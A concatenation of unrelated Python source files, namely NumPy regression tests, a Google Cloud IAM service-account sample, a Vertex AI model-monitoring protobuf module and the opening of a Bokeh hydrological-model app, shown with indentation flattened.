a = np.array(0, dtype=object)
a[...] += 1
assert_equal(a, 1)
def test_object_array_self_copy(self):
        # When an object array is copied into itself, DECREF'ing before
        # INCREF'ing could cause segmentation faults (gh-3787)
a = np.array(object(), dtype=object)
np.copyto(a, a)
assert_equal(sys.getrefcount(a[()]), 2)
a[()].__class__ # will segfault if object was deleted
def test_zerosize_accumulate(self):
"Ticket #1733"
x = np.array([[42, 0]], dtype=np.uint32)
assert_equal(np.add.accumulate(x[:-1, 0]), [])
def test_objectarray_setfield(self):
# Setfield should not overwrite Object fields with non-Object data
x = np.array([1, 2, 3], dtype=object)
assert_raises(TypeError, x.setfield, 4, np.int32, 0)
def test_setting_rank0_string(self):
"Ticket #1736"
s1 = asbytes("hello1")
s2 = asbytes("hello2")
a = np.zeros((), dtype="S10")
a[()] = s1
assert_equal(a, np.array(s1))
a[()] = np.array(s2)
assert_equal(a, np.array(s2))
a = np.zeros((), dtype='f4')
a[()] = 3
assert_equal(a, np.array(3))
a[()] = np.array(4)
assert_equal(a, np.array(4))
def test_string_astype(self):
"Ticket #1748"
s1 = asbytes('black')
s2 = asbytes('white')
s3 = asbytes('other')
a = np.array([[s1], [s2], [s3]])
assert_equal(a.dtype, np.dtype('S5'))
b = a.astype(np.dtype('S0'))
assert_equal(b.dtype, np.dtype('S5'))
def test_ticket_1756(self):
# Ticket #1756
s = asbytes('0123456789abcdef')
a = np.array([s]*5)
for i in range(1, 17):
a1 = np.array(a, "|S%d" % i)
a2 = np.array([s[:i]]*5)
assert_equal(a1, a2)
def test_fields_strides(self):
"Ticket #1760"
r = np.fromstring('abcdefghijklmnop'*4*3, dtype='i4,(2,3)u2')
assert_equal(r[0:3:2]['f1'], r['f1'][0:3:2])
assert_equal(r[0:3:2]['f1'][0], r[0:3:2][0]['f1'])
assert_equal(r[0:3:2]['f1'][0][()], r[0:3:2][0]['f1'][()])
assert_equal(r[0:3:2]['f1'][0].strides, r[0:3:2][0]['f1'].strides)
def test_alignment_update(self):
# Check that alignment flag is updated on stride setting
a = np.arange(10)
assert_(a.flags.aligned)
a.strides = 3
assert_(not a.flags.aligned)
def test_ticket_1770(self):
"Should not segfault on python 3k"
import numpy as np
try:
a = np.zeros((1,), dtype=[('f1', 'f')])
a['f1'] = 1
a['f2'] = 1
except ValueError:
pass
except:
raise AssertionError
def test_ticket_1608(self):
"x.flat shouldn't modify data"
x = np.array([[1, 2], [3, 4]]).T
np.array(x.flat)
assert_equal(x, [[1, 3], [2, 4]])
def test_pickle_string_overwrite(self):
import re
data = np.array([1], dtype='b')
blob = pickle.dumps(data, protocol=1)
data = pickle.loads(blob)
# Check that loads does not clobber interned strings
s = re.sub("a(.)", "\x01\\1", "a_")
assert_equal(s[0], "\x01")
data[0] = 0xbb
s = re.sub("a(.)", "\x01\\1", "a_")
assert_equal(s[0], "\x01")
def test_pickle_bytes_overwrite(self):
if sys.version_info[0] >= 3:
data = np.array([1], dtype='b')
data = pickle.loads(pickle.dumps(data))
data[0] = 0xdd
bytestring = "\x01 ".encode('ascii')
assert_equal(bytestring[0:1], '\x01'.encode('ascii'))
def test_pickle_py2_array_latin1_hack(self):
# Check that unpickling hacks in Py3 that support
# encoding='latin1' work correctly.
# Python2 output for pickle.dumps(numpy.array([129], dtype='b'))
data = asbytes("cnumpy.core.multiarray\n_reconstruct\np0\n(cnumpy\nndarray\np1\n(I0\n"
"tp2\nS'b'\np3\ntp4\nRp5\n(I1\n(I1\ntp6\ncnumpy\ndtype\np7\n(S'i1'\np8\n"
"I0\nI1\ntp9\nRp10\n(I3\nS'|'\np11\nNNNI-1\nI-1\nI0\ntp12\nbI00\nS'\\x81'\n"
"p13\ntp14\nb.")
if sys.version_info[0] >= 3:
# This should work:
result = pickle.loads(data, encoding='latin1')
assert_array_equal(result, np.array([129], dtype='b'))
# Should not segfault:
assert_raises(Exception, pickle.loads, data, encoding='koi8-r')
def test_pickle_py2_scalar_latin1_hack(self):
# Check that scalar unpickling hack in Py3 that supports
# encoding='latin1' work correctly.
# Python2 output for pickle.dumps(...)
datas = [
# (original, python2_pickle, koi8r_validity)
(np.unicode_('\u6bd2'),
asbytes("cnumpy.core.multiarray\nscalar\np0\n(cnumpy\ndtype\np1\n"
"(S'U1'\np2\nI0\nI1\ntp3\nRp4\n(I3\nS'<'\np5\nNNNI4\nI4\nI0\n"
"tp6\nbS'\\xd2k\\x00\\x00'\np7\ntp8\nRp9\n."),
'invalid'),
(np.float64(9e123),
asbytes("cnumpy.core.multiarray\nscalar\np0\n(cnumpy\ndtype\np1\n(S'f8'\n"
"p2\nI0\nI1\ntp3\nRp4\n(I3\nS'<'\np5\nNNNI-1\nI-1\nI0\ntp6\n"
"bS'O\\x81\\xb7Z\\xaa:\\xabY'\np7\ntp8\nRp9\n."),
'invalid'),
(np.bytes_(asbytes('\x9c')), # different 8-bit code point in KOI8-R vs latin1
asbytes("cnumpy.core.multiarray\nscalar\np0\n(cnumpy\ndtype\np1\n(S'S1'\np2\n"
"I0\nI1\ntp3\nRp4\n(I3\nS'|'\np5\nNNNI1\nI1\nI0\ntp6\nbS'\\x9c'\np7\n"
"tp8\nRp9\n."),
'different'),
]
if sys.version_info[0] >= 3:
for original, data, koi8r_validity in datas:
result = pickle.loads(data, encoding='latin1')
assert_equal(result, original)
                # Decoding under a non-latin1 encoding (e.g. KOI8-R) can
# produce bad results, but should not segfault.
if koi8r_validity == 'different':
# Unicode code points happen to lie within latin1,
                    # but are different in koi8-r, resulting in silent
# bogus results
result = pickle.loads(data, encoding='koi8-r')
assert_(result != original)
elif koi8r_validity == 'invalid':
                    # Unicode code points outside latin1, so decoding
                    # raises an encoding exception
assert_raises(ValueError, pickle.loads, data, encoding='koi8-r')
else:
raise ValueError(koi8r_validity)
def test_structured_type_to_object(self):
a_rec = np.array([(0, 1), (3, 2)], dtype='i4,i8')
a_obj = np.empty((2,), dtype=object)
a_obj[0] = (0, 1)
a_obj[1] = (3, 2)
# astype records -> object
assert_equal(a_rec.astype(object), a_obj)
# '=' records -> object
b = np.empty_like(a_obj)
b[...] = a_rec
assert_equal(b, a_obj)
# '=' object -> records
b = np.empty_like(a_rec)
b[...] = a_obj
assert_equal(b, a_rec)
def test_assign_obj_listoflists(self):
# Ticket # 1870
# The inner list should get assigned to the object elements
a = np.zeros(4, dtype=object)
b = a.copy()
a[0] = [1]
a[1] = [2]
a[2] = [3]
a[3] = [4]
b[...] = [[1], [2], [3], [4]]
assert_equal(a, b)
# The first dimension should get broadcast
a = np.zeros((2, 2), dtype=object)
a[...] = [[1, 2]]
assert_equal(a, [[1, 2], [1, 2]])
def test_memoryleak(self):
# Ticket #1917 - ensure that array data doesn't leak
for i in range(1000):
# 100MB times 1000 would give 100GB of memory usage if it leaks
a = np.empty((100000000,), dtype='i1')
del a
def test_ufunc_reduce_memoryleak(self):
a = np.arange(6)
acnt = sys.getrefcount(a)
np.add.reduce(a)
assert_equal(sys.getrefcount(a), acnt)
def test_search_sorted_invalid_arguments(self):
# Ticket #2021, should not segfault.
x = np.arange(0, 4, dtype='datetime64[D]')
assert_raises(TypeError, x.searchsorted, 1)
def test_string_truncation(self):
# Ticket #1990 - Data can be truncated in creation of an array from a
# mixed sequence of numeric values and strings
for val in [True, 1234, 123.4, complex(1, 234)]:
for tostr in [asunicode, asbytes]:
b = np.array([val, tostr('xx')])
assert_equal(tostr(b[0]), tostr(val))
b = np.array([tostr('xx'), val])
assert_equal(tostr(b[1]), tostr(val))
# test also with longer strings
b = np.array([val, tostr('xxxxxxxxxx')])
assert_equal(tostr(b[0]), tostr(val))
b = np.array([tostr('xxxxxxxxxx'), val])
assert_equal(tostr(b[1]), tostr(val))
def test_string_truncation_ucs2(self):
# Ticket #2081. Python compiled with two byte unicode
# can lead to truncation if itemsize is not properly
# adjusted for Numpy's four byte unicode.
if sys.version_info[0] >= 3:
a = np.array(['abcd'])
else:
a = np.array([sixu('abcd')])
assert_equal(a.dtype.itemsize, 16)
def test_unique_stable(self):
# Ticket #2063 must always choose stable sort for argsort to
# get consistent results
v = np.array(([0]*5 + [1]*6 + [2]*6)*4)
res = np.unique(v, return_index=True)
tgt = (np.array([0, 1, 2]), np.array([ 0, 5, 11]))
assert_equal(res, tgt)
def test_unicode_alloc_dealloc_match(self):
# Ticket #1578, the mismatch only showed up when running
# python-debug for python versions >= 2.7, and then as
# a core dump and error message.
a = np.array(['abc'], dtype=np.unicode)[0]
del a
def test_refcount_error_in_clip(self):
# Ticket #1588
a = np.zeros((2,), dtype='>i2').clip(min=0)
x = a + a
# This used to segfault:
y = str(x)
# Check the final string:
assert_(y == "[0 0]")
def test_searchsorted_wrong_dtype(self):
# Ticket #2189, it used to segfault, so we check that it raises the
# proper exception.
a = np.array([('a', 1)], dtype='S1, int')
assert_raises(TypeError, np.searchsorted, a, 1.2)
# Ticket #2066, similar problem:
dtype = np.format_parser(['i4', 'i4'], [], [])
a = np.recarray((2, ), dtype)
assert_raises(TypeError, np.searchsorted, a, 1)
def test_complex64_alignment(self):
# Issue gh-2668 (trac 2076), segfault on sparc due to misalignment
dtt = np.complex64
arr = np.arange(10, dtype=dtt)
# 2D array
arr2 = np.reshape(arr, (2, 5))
# Fortran write followed by (C or F) read caused bus error
data_str = arr2.tobytes('F')
data_back = np.ndarray(arr2.shape,
arr2.dtype,
buffer=data_str,
order='F')
assert_array_equal(arr2, data_back)
def test_structured_count_nonzero(self):
arr = np.array([0, 1]).astype('i4, (2)i4')[:1]
count = np.count_nonzero(arr)
assert_equal(count, 0)
def test_copymodule_preserves_f_contiguity(self):
a = np.empty((2, 2), order='F')
b = copy.copy(a)
c = copy.deepcopy(a)
assert_(b.flags.fortran)
assert_(b.flags.f_contiguous)
assert_(c.flags.fortran)
assert_(c.flags.f_contiguous)
def test_fortran_order_buffer(self):
import numpy as np
a = np.array([['Hello', 'Foob']], dtype='U5', order='F')
arr = np.ndarray(shape=[1, 2, 5], dtype='U1', buffer=a)
arr2 = np.array([[[sixu('H'), sixu('e'), sixu('l'), sixu('l'), sixu('o')],
[sixu('F'), sixu('o'), sixu('o'), sixu('b'), sixu('')]]])
assert_array_equal(arr, arr2)
def test_assign_from_sequence_error(self):
# Ticket #4024.
arr = np.array([1, 2, 3])
assert_raises(ValueError, arr.__setitem__, slice(None), [9, 9])
arr.__setitem__(slice(None), [9])
assert_equal(arr, [9, 9, 9])
def test_format_on_flex_array_element(self):
# Ticket #4369.
dt = np.dtype([('date', '<M8[D]'), ('val', '<f8')])
arr = np.array([('2000-01-01', 1)], dt)
formatted = '{0}'.format(arr[0])
assert_equal(formatted, str(arr[0]))
def test_deepcopy_on_0d_array(self):
# Ticket #3311.
arr = np.array(3)
arr_cp = copy.deepcopy(arr)
assert_equal(arr, arr_cp)
assert_equal(arr.shape, arr_cp.shape)
assert_equal(int(arr), int(arr_cp))
self.assertTrue(arr is not arr_cp)
self.assertTrue(isinstance(arr_cp, type(arr)))
def test_bool_subscript_crash(self):
# gh-4494
c = np.rec.array([(1, 2, 3), (4, 5, 6)])
masked = c[np.array([True, False])]
base = masked.base
del masked, c
base.dtype
def test_richcompare_crash(self):
# gh-4613
import operator as op
# dummy class where __array__ throws exception
class Foo(object):
__array_priority__ = 1002
def __array__(self,*args,**kwargs):
raise Exception()
rhs = Foo()
lhs = np.array(1)
for f in [op.lt, op.le, op.gt, op.ge]:
if sys.version_info[0] >= 3:
assert_raises(TypeError, f, lhs, rhs)
else:
f(lhs, rhs)
assert_(not op.eq(lhs, rhs))
assert_(op.ne(lhs, rhs))
def test_richcompare_scalar_and_subclass(self):
# gh-4709
class Foo(np.ndarray):
def __eq__(self, other):
return "OK"
x = np.array([1,2,3]).view(Foo)
assert_equal(10 == x, "OK")
assert_equal(np.int32(10) == x, "OK")
assert_equal(np.array([10]) == x, "OK")
def test_pickle_empty_string(self):
# gh-3926
import pickle
test_string = np.string_('')
assert_equal(pickle.loads(pickle.dumps(test_string)), test_string)
def test_frompyfunc_many_args(self):
# gh-5672
def passer(*args):
pass
assert_raises(ValueError, np.frompyfunc, passer, 32, 1)
def test_repeat_broadcasting(self):
# gh-5743
a = np.arange(60).reshape(3, 4, 5)
for axis in chain(range(-a.ndim, a.ndim), [None]):
assert_equal(a.repeat(2, axis=axis), a.repeat([2], axis=axis))
def test_frompyfunc_nout_0(self):
# gh-2014
def f(x):
x[0], x[-1] = x[-1], x[0]
uf = np.frompyfunc(f, 1, 0)
a = np.array([[1, 2, 3], [4, 5], [6, 7, 8, 9]])
assert_equal(uf(a), ())
assert_array_equal(a, [[3, 2, 1], [5, 4], [9, 7, 8, 6]])
def test_leak_in_structured_dtype_comparison(self):
# gh-6250
recordtype = np.dtype([('a', np.float64),
('b', np.int32),
('d', (np.str, 5))])
# Simple case
a = np.zeros(2, dtype=recordtype)
for i in range(100):
a == a
assert_(sys.getrefcount(a) < 10)
# The case in the bug report.
before = sys.getrefcount(a)
u, v = a[0], a[1]
u == v
del u, v
gc.collect()
after = sys.getrefcount(a)
assert_equal(before, after)
def test_empty_percentile(self):
# gh-6530 / gh-6553
assert_array_equal(np.percentile(np.arange(10), []), np.array([]))
def test_void_compare_segfault(self):
# gh-6922. The following should not segfault
a = np.ones(3, dtype=[('object', 'O'), ('int', '<i2')])
a.sort()
if __name__ == "__main__":
run_module_suite()
|
#!/usr/bin/env python
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Demonstrates how to perform basic operations with Google Cloud IAM
service accounts.
For more information, see the documentation at
https://cloud.google.com/iam/docs/creating-managing-service-accounts.
"""
import argparse
import os
from google.oauth2 import service_account
import googleapiclient.discovery
credentials = service_account.Credentials.from_service_account_file(
filename=os.environ['GOOGLE_APPLICATION_CREDENTIALS'],
scopes=['https://www.googleapis.com/auth/cloud-platform'])
service = googleapiclient.discovery.build(
'iam', 'v1', credentials=credentials)
# [START iam_create_service_account]
def create_service_account(project_id, name, display_name):
"""Creates a service account."""
# pylint: disable=no-member
service_account = service.projects().serviceAccounts().create(
name='projects/' + project_id,
body={
'accountId': name,
'serviceAccount': {
'displayName': display_name
}
}).execute()
print('Created service account: ' + service_account['email'])
return service_account
# [END iam_create_service_account]
# [START iam_list_service_accounts]
def list_service_accounts(project_id):
"""Lists all service accounts for the current project."""
# pylint: disable=no-member
service_accounts = service.projects().serviceAccounts().list(
name='projects/' + project_id).execute()
for account in service_accounts['accounts']:
print('Name: ' + account['name'])
print('Email: ' + account['email'])
print(' ')
return service_accounts
# [END iam_list_service_accounts]
# [START iam_rename_service_account]
def rename_service_account(email, new_display_name):
"""Changes a service account's display name."""
# First, get a service account using List() or Get()
resource = 'projects/-/serviceAccounts/' + email
# pylint: disable=no-member
service_account = service.projects().serviceAccounts().get(
name=resource).execute()
# Then you can update the display name
service_account['displayName'] = new_display_name
service_account = service.projects().serviceAccounts().update(
name=resource, body=service_account).execute()
print('Updated display name for {} to: {}'.format(
service_account['email'], service_account['displayName']))
return service_account
# [END iam_rename_service_account]
# [START iam_delete_service_account]
def delete_service_account(email):
"""Deletes a service account."""
# pylint: disable=no-member
service.projects().serviceAccounts().delete(
name='projects/-/serviceAccounts/' + email).execute()
print('Deleted service account: ' + email)
# [END iam_delete_service_account]
def main():
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
subparsers = parser.add_subparsers(dest='command')
# Create
create_parser = subparsers.add_parser(
'create', help=create_service_account.__doc__)
create_parser.add_argument('project_id')
create_parser.add_argument('name')
create_parser.add_argument('display_name')
# List
list_parser = subparsers.add_parser(
'list', help=list_service_accounts.__doc__)
list_parser.add_argument('project_id')
# Rename
rename_parser = subparsers.add_parser(
        'rename', help=rename_service_account.__doc__)
rename_parser.add_argument('email')
rename_parser.add_argument('new_display_name')
# Delete
delete_parser = subparsers.add_parser(
'delete', help=delete_service_account.__doc__)
delete_parser.add_argument('email')
args = parser.parse_args()
if args.command == 'create':
create_service_account(args.project_id, args.name, args.display_name)
elif args.command == 'list':
list_service_accounts(args.project_id)
elif args.command == 'rename':
rename_service_account(args.email, args.new_display_name)
elif args.command == 'delete':
delete_service_account(args.email)
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.aiplatform_v1.types import io
__protobuf__ = proto.module(
package="google.cloud.aiplatform.v1",
manifest={
"ModelMonitoringObjectiveConfig",
"ModelMonitoringAlertConfig",
"ThresholdConfig",
"SamplingStrategy",
},
)
class ModelMonitoringObjectiveConfig(proto.Message):
r"""Next ID: 7
Attributes:
training_dataset (google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.TrainingDataset):
Training dataset for models. This field has
to be set only if
TrainingPredictionSkewDetectionConfig is
specified.
training_prediction_skew_detection_config (google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.TrainingPredictionSkewDetectionConfig):
The config for skew between training data and
prediction data.
prediction_drift_detection_config (google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.PredictionDriftDetectionConfig):
The config for drift of prediction data.
explanation_config (google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.ExplanationConfig):
The config for integrating with Vertex
Explainable AI.
"""
class TrainingDataset(proto.Message):
r"""Training Dataset information.
This message has `oneof`_ fields (mutually exclusive fields).
For each oneof, at most one member field can be set at the same time.
Setting any member of the oneof automatically clears all other
members.
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
dataset (str):
The resource name of the Dataset used to
train this Model.
This field is a member of `oneof`_ ``data_source``.
gcs_source (google.cloud.aiplatform_v1.types.GcsSource):
The Google Cloud Storage uri of the unmanaged
Dataset used to train this Model.
This field is a member of `oneof`_ ``data_source``.
bigquery_source (google.cloud.aiplatform_v1.types.BigQuerySource):
The BigQuery table of the unmanaged Dataset
used to train this Model.
This field is a member of `oneof`_ ``data_source``.
data_format (str):
Data format of the dataset, only applicable
if the input is from Google Cloud Storage.
The possible formats are:
"tf-record"
The source file is a TFRecord file.
"csv"
The source file is a CSV file.
target_field (str):
The target field name the model is to
predict. This field will be excluded when doing
Predict and (or) Explain for the training data.
logging_sampling_strategy (google.cloud.aiplatform_v1.types.SamplingStrategy):
Strategy to sample data from Training
Dataset. If not set, we process the whole
dataset.
"""
dataset = proto.Field(proto.STRING, number=3, oneof="data_source",)
gcs_source = proto.Field(
proto.MESSAGE, number=4, oneof="data_source", message=io.GcsSource,
)
bigquery_source = proto.Field(
proto.MESSAGE, number=5, oneof="data_source", message=io.BigQuerySource,
)
data_format = proto.Field(proto.STRING, number=2,)
target_field = proto.Field(proto.STRING, number=6,)
logging_sampling_strategy = proto.Field(
proto.MESSAGE, number=7, message="SamplingStrategy",
)
class TrainingPredictionSkewDetectionConfig(proto.Message):
r"""The config for Training & Prediction data skew detection. It
specifies the training dataset sources and the skew detection
parameters.
Attributes:
skew_thresholds (Sequence[google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.TrainingPredictionSkewDetectionConfig.SkewThresholdsEntry]):
Key is the feature name and value is the
threshold. If a feature needs to be monitored
for skew, a value threshold must be configured
for that feature. The threshold here is against
feature distribution distance between the
training and prediction feature.
attribution_score_skew_thresholds (Sequence[google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.TrainingPredictionSkewDetectionConfig.AttributionScoreSkewThresholdsEntry]):
Key is the feature name and value is the
threshold. The threshold here is against
attribution score distance between the training
and prediction feature.
"""
skew_thresholds = proto.MapField(
proto.STRING, proto.MESSAGE, number=1, message="ThresholdConfig",
)
attribution_score_skew_thresholds = proto.MapField(
proto.STRING, proto.MESSAGE, number=2, message="ThresholdConfig",
)
class PredictionDriftDetectionConfig(proto.Message):
r"""The config for Prediction data drift detection.
Attributes:
drift_thresholds (Sequence[google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.PredictionDriftDetectionConfig.DriftThresholdsEntry]):
Key is the feature name and value is the
threshold. If a feature needs to be monitored
for drift, a value threshold must be configured
for that feature. The threshold here is against
feature distribution distance between different
                time windows.
attribution_score_drift_thresholds (Sequence[google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.PredictionDriftDetectionConfig.AttributionScoreDriftThresholdsEntry]):
Key is the feature name and value is the
threshold. The threshold here is against
attribution score distance between different
time windows.
"""
drift_thresholds = proto.MapField(
proto.STRING, proto.MESSAGE, number=1, message="ThresholdConfig",
)
attribution_score_drift_thresholds = proto.MapField(
proto.STRING, proto.MESSAGE, number=2, message="ThresholdConfig",
)
class ExplanationConfig(proto.Message):
r"""The config for integrating with Vertex Explainable AI. Only
applicable if the Model has explanation_spec populated.
Attributes:
enable_feature_attributes (bool):
                Whether to analyze the Vertex Explainable AI
                feature attribution scores. If set to true,
                Vertex AI will log the feature attributions from
                the explain response and run skew/drift detection
                on them.
explanation_baseline (google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.ExplanationConfig.ExplanationBaseline):
Predictions generated by the
BatchPredictionJob using baseline dataset.
"""
class ExplanationBaseline(proto.Message):
r"""Output from
[BatchPredictionJob][google.cloud.aiplatform.v1.BatchPredictionJob]
for Model Monitoring baseline dataset, which can be used to generate
baseline attribution scores.
This message has `oneof`_ fields (mutually exclusive fields).
For each oneof, at most one member field can be set at the same time.
Setting any member of the oneof automatically clears all other
members.
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
gcs (google.cloud.aiplatform_v1.types.GcsDestination):
Cloud Storage location for BatchExplain
output.
This field is a member of `oneof`_ ``destination``.
bigquery (google.cloud.aiplatform_v1.types.BigQueryDestination):
BigQuery location for BatchExplain output.
This field is a member of `oneof`_ ``destination``.
prediction_format (google.cloud.aiplatform_v1.types.ModelMonitoringObjectiveConfig.ExplanationConfig.ExplanationBaseline.PredictionFormat):
The storage format of the predictions
                    generated by the BatchPredictionJob.
"""
class PredictionFormat(proto.Enum):
r"""The storage format of the predictions generated
                by the BatchPredictionJob.
"""
PREDICTION_FORMAT_UNSPECIFIED = 0
JSONL = 2
BIGQUERY = 3
gcs = proto.Field(
proto.MESSAGE, number=2, oneof="destination", message=io.GcsDestination,
)
bigquery = proto.Field(
proto.MESSAGE,
number=3,
oneof="destination",
message=io.BigQueryDestination,
)
prediction_format = proto.Field(
proto.ENUM,
number=1,
enum="ModelMonitoringObjectiveConfig.ExplanationConfig.ExplanationBaseline.PredictionFormat",
)
enable_feature_attributes = proto.Field(proto.BOOL, number=1,)
explanation_baseline = proto.Field(
proto.MESSAGE,
number=2,
message="ModelMonitoringObjectiveConfig.ExplanationConfig.ExplanationBaseline",
)
training_dataset = proto.Field(proto.MESSAGE, number=1, message=TrainingDataset,)
training_prediction_skew_detection_config = proto.Field(
proto.MESSAGE, number=2, message=TrainingPredictionSkewDetectionConfig,
)
prediction_drift_detection_config = proto.Field(
proto.MESSAGE, number=3, message=PredictionDriftDetectionConfig,
)
explanation_config = proto.Field(
proto.MESSAGE, number=5, message=ExplanationConfig,
)
class ModelMonitoringAlertConfig(proto.Message):
r"""Next ID: 3
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
email_alert_config (google.cloud.aiplatform_v1.types.ModelMonitoringAlertConfig.EmailAlertConfig):
Email alert config.
This field is a member of `oneof`_ ``alert``.
enable_logging (bool):
Dump the anomalies to Cloud Logging. The anomalies will be
            put into a JSON payload encoded from the proto
[google.cloud.aiplatform.logging.ModelMonitoringAnomaliesLogEntry][].
            These entries can then be routed via a log sink to Pub/Sub
            or any other service supported by Cloud Logging.
"""
class EmailAlertConfig(proto.Message):
r"""The config for email alert.
Attributes:
user_emails (Sequence[str]):
The email addresses to send the alert.
"""
user_emails = proto.RepeatedField(proto.STRING, number=1,)
email_alert_config = proto.Field(
proto.MESSAGE, number=1, oneof="alert", message=EmailAlertConfig,
)
enable_logging = proto.Field(proto.BOOL, number=2,)
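# Illustrative sketch (not part of the generated API): an alert config that
# emails a reviewer and also dumps anomalies to Cloud Logging. The address
# below is a placeholder.
def _example_alert_config():
    return ModelMonitoringAlertConfig(
        email_alert_config=ModelMonitoringAlertConfig.EmailAlertConfig(
            user_emails=["ml-oncall@example.com"],
        ),
        enable_logging=True,
    )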
class ThresholdConfig(proto.Message):
r"""The config for feature monitoring threshold.
Next ID: 3
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
value (float):
Specify a threshold value that can trigger
the alert. If this threshold config is for
feature distribution distance: 1. For
categorical feature, the distribution distance
            is calculated by the L-infinity norm.
2. For numerical feature, the distribution
distance is calculated by Jensen–Shannon
divergence.
Each feature must have a non-zero threshold if
            it needs to be monitored. Otherwise no alert
will be triggered for that feature.
This field is a member of `oneof`_ ``threshold``.
"""
value = proto.Field(proto.DOUBLE, number=1, oneof="threshold",)
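# Illustrative sketch (not part of the generated API): per-feature skew
# thresholds use the distances described above (L-infinity norm for
# categorical features, Jensen-Shannon divergence for numerical features);
# the feature names and threshold values are placeholders.
def _example_skew_thresholds():
    return ModelMonitoringObjectiveConfig(
        training_prediction_skew_detection_config=ModelMonitoringObjectiveConfig.TrainingPredictionSkewDetectionConfig(
            skew_thresholds={
                "country": ThresholdConfig(value=0.001),
                "age": ThresholdConfig(value=0.003),
            },
        ),
    )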
class SamplingStrategy(proto.Message):
r"""Sampling Strategy for logging, can be for both training and
prediction dataset.
Next ID: 2
Attributes:
random_sample_config (google.cloud.aiplatform_v1.types.SamplingStrategy.RandomSampleConfig):
Random sample config. Will support more
sampling strategies later.
"""
class RandomSampleConfig(proto.Message):
r"""Requests are randomly selected.
Attributes:
sample_rate (float):
Sample rate (0, 1]
"""
sample_rate = proto.Field(proto.DOUBLE, number=1,)
random_sample_config = proto.Field(
proto.MESSAGE, number=1, message=RandomSampleConfig,
)
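# Illustrative sketch (not part of the generated API): log a random 20% of
# requests; sample_rate must lie in (0, 1] as documented above.
def _example_sampling_strategy():
    return SamplingStrategy(
        random_sample_config=SamplingStrategy.RandomSampleConfig(sample_rate=0.2),
    )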
__all__ = tuple(sorted(__protobuf__.manifest))
|
"""
main page
"""
#import os
#os.chdir("C:/Users/Mostafa/Desktop/My Files/thesis/My Thesis/Data_and_Models/Interface/Distributed_Hydrological_model")
import sys
sys.path.append("HBV_distributed/function")
#%% Library
import numpy as np
import pandas as pd
import time
import datetime as dt
#import gdal
from math import pi
from bokeh.layouts import widgetbox, gridplot, column
from bokeh.models.widgets import Slider, Button, RadioGroup, TextInput, Div, Tabs
from bokeh.models.widgets import DataTable, DateFormatter, TableColumn, Panel
from bokeh.models import ColumnDataSource
from bokeh.plotting import figure
from bokeh.io import curdoc, show
from bokeh.models import LinearAxis, Range1d
# functions
import DHBV_functions
import sugawara as sug
import fsf_model
import bwc_collis as BW
#%% Read the output.asc file
skip_rows = 16 # Number of rows to skip in the output file
data_file = 'myapp/static/data/output.asc' # Name of the output file
data_file1 = 'HBV_distributed/static/input_data/' # Path to the input data directory
#
s = dt.datetime(2012, 6, 14, 19, 0, 0)
e = dt.datetime(2013, 12, 23, 0, 0, 0)
#
#index=pd.date_range(s,e,freq="1H")
#lake_data=pd.DataFrame(index=index)
#lake_data['et']=np.loadtxt(data_file1+"lake/" + "et.txt")
#lake_data['tm']=np.loadtxt(data_file1+"lake/" + "avgtemp.txt")
#lake_data['plake']=np.loadtxt(data_file1+"lake/" + "plake.txt")
#lake_data['Q']=np.loadtxt(data_file1+"lake/" + "Q.txt")
#lake_data['t']=np.loadtxt(data_file1+"lake/" + "temp.txt")
#lakecell=[2,1] # 4km
#lakecell=[4,2] # 2km
#lakecell=[10,4] # 1km
#lakecell=[19,10] # 500m
#sp_prec_c=np.load(data_file1 +'sp_prec_c.npy')
#sp_et_c=np.load(data_file1 +'sp_et_c.npy')
#sp_temp_c=np.load(data_file1 +'sp_temp_c.npy')
#
#flow_acc_table=DHBV_functions.load_obj(data_file1 +"flow_acc_table")
#flow_acc=np.load(data_file1 +'flow_acc.npy')
#DEM = gdal.Open(data_file+"/DEM/"+"dem_4km.tif")
#elev, no_val=DHBV_functions.get_raster_data(DEM)
#
#elev[elev==no_val]=np.nan
#no_cells=np.size(elev[:,:])-np.count_nonzero(np.isnan(elev[:,:]))
# Read data from the output file
data = pd.read_csv(data_file,
skiprows=skip_rows,
skipinitialspace=True,
index_col='Time')
# Create vector with time stamps
time_index = pd.date_range('1994 12 07 20:00', periods=len(data), freq='H')
data.set_index(time_index, inplace=True)
# Initial Parameters
pars = [0.5, 0.2, 0.01, 0.1, 10.0, 20.0, 1, 1]
extra_pars = [1, 147.0] # time factor and area (extra parameters)
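# The actual model lives in sugawara.simulate; the sketch below is only an
# illustration (an assumption, not the project's code) of the classic two-tank
# Sugawara structure that pars/extra_pars parameterize: k1 and k2 drain the top
# tank through outlets at heights d1 and d2, k3 is percolation to the bottom
# tank, and k4 drains the bottom tank.
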